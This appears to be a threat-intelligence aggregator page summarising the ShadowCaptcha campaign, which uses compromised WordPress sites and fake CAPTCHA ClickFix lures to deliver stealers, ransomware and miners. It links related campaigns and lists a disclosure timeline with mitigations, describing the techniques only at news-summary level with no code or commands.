ShadowCaptcha WordPress ClickFix campaign
Campaign
Summary
Hide ▲
Show ▼
The ShadowCaptcha campaign is abusing over 100 compromised WordPress sites to funnel visitors into fake CAPTCHA pages that deliver info stealers, ransomware, and cryptocurrency miners, widening malware risk across multiple sectors. First detected in August 2025, the operation uses ClickFix lures and malicious JavaScript to push victims toward Windows Run prompts or HTA execution through mshta.exe and msiexec.exe. The chain can end in Lumma and Rhadamanthys theft payloads, Epsilon Red ransomware, or XMRig mining.
Related Happenings
Storm-1175 high-tempo Medusa ransomware campaign
Campaign
First: 07.04.2026 13:02
Last: 07.04.2026 13:02
Sources 1
About this happening:
**Storm-1175** is running a **high-tempo Medusa ransomware campaign** that has repeatedly exploited **n-day and zero-day flaws** to gain initial access before patching closes the...
Storm-1175 high-tempo Medusa ransomware campaign
CampaignAbout this happening: **Storm-1175** is running a **high-tempo Medusa ransomware campaign** that has repeatedly exploited **n-day and zero-day flaws** to gain initial access before patching closes the...
BadIIS malware deployment on compromised IIS servers in Thailand and Vietnam
Malware Activity
First: 30.01.2026 14:08
Last: 30.01.2026 14:08
Sources 1
About this happening:
**BadIIS** is a **malicious native IIS module** used on **compromised IIS servers** to support **SEO fraud** and traffic manipulation. **Cisco Talos** says the activity is tied to...
BadIIS malware deployment on compromised IIS servers in Thailand and Vietnam
Malware ActivityAbout this happening: **BadIIS** is a **malicious native IIS module** used on **compromised IIS servers** to support **SEO fraud** and traffic manipulation. **Cisco Talos** says the activity is tied to...
JackFix ClickFix fake-adult-site phishing campaign
Campaign
First: 25.11.2025 16:18
Last: 25.11.2025 16:18
Sources 1
About this happening:
The **JackFix** campaign is using **fake adult websites** and **ClickFix** lures to trick users into running malicious commands, enabling an infection chain that can drop **steale...
JackFix ClickFix fake-adult-site phishing campaign
CampaignAbout this happening: The **JackFix** campaign is using **fake adult websites** and **ClickFix** lures to trick users into running malicious commands, enabling an infection chain that can drop **steale...
ClickFix variants delivering LummaC2 and Rhadamanthys
Malware Activity
First: 24.11.2025 22:42
Last: 24.11.2025 22:42
Sources 1
About this happening:
Since **October 1**, **ClickFix** variants have been using a **fake Windows Update** screen and **human verification** lures to trick Windows users into pasting commands that exec...
ClickFix variants delivering LummaC2 and Rhadamanthys
Malware ActivityAbout this happening: Since **October 1**, **ClickFix** variants have been using a **fake Windows Update** screen and **human verification** lures to trick Windows users into pasting commands that exec...
GootLoader malware activity with WOFF2 font filename obfuscation
Malware Activity
First: 11.11.2025 17:44
Last: 11.11.2025 17:44
Sources 1
About this happening:
The **GootLoader** loader has resurfaced with a new **WOFF2 font-based** filename obfuscation trick that hides payload names and helps it evade analysis. Huntress observed **three...
GootLoader malware activity with WOFF2 font filename obfuscation
Malware ActivityAbout this happening: The **GootLoader** loader has resurfaced with a new **WOFF2 font-based** filename obfuscation trick that hides payload names and helps it evade analysis. Huntress observed **three...
Timeline
-
26.08.2025 13:45 1 articles · 9mo ago
ShadowCaptcha WordPress ClickFix campaign disclosed
Initial DisclosureShadowCaptcha was disclosed as a large-scale campaign first detected in August 2025 and observed abusing over 100 compromised WordPress sites to redirect visitors to fake Cloudflare or Google CAPTCHA pages. The ClickFix chain uses malicious JavaScript, the Windows Run dialog, saved HTA files run through mshta.exe, and MSI installers launched with msiexec.exe to deliver Lumma and Rhadamanthys stealers, Epsilon Red ransomware, or XMRig miners; mining variants also used clipboard poisoning, anti-debugging, DLL side-loading, and a vulnerable WinRing0x64.sys driver. Infected WordPress sites were reported across Australia, Brazil, Italy, Canada, Colombia, and Israel, and mitigations included user training against ClickFix prompts, WordPress patching, network segmentation, and MFA.
Show sources
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners — thehackernews.com — 26.08.2025 13:45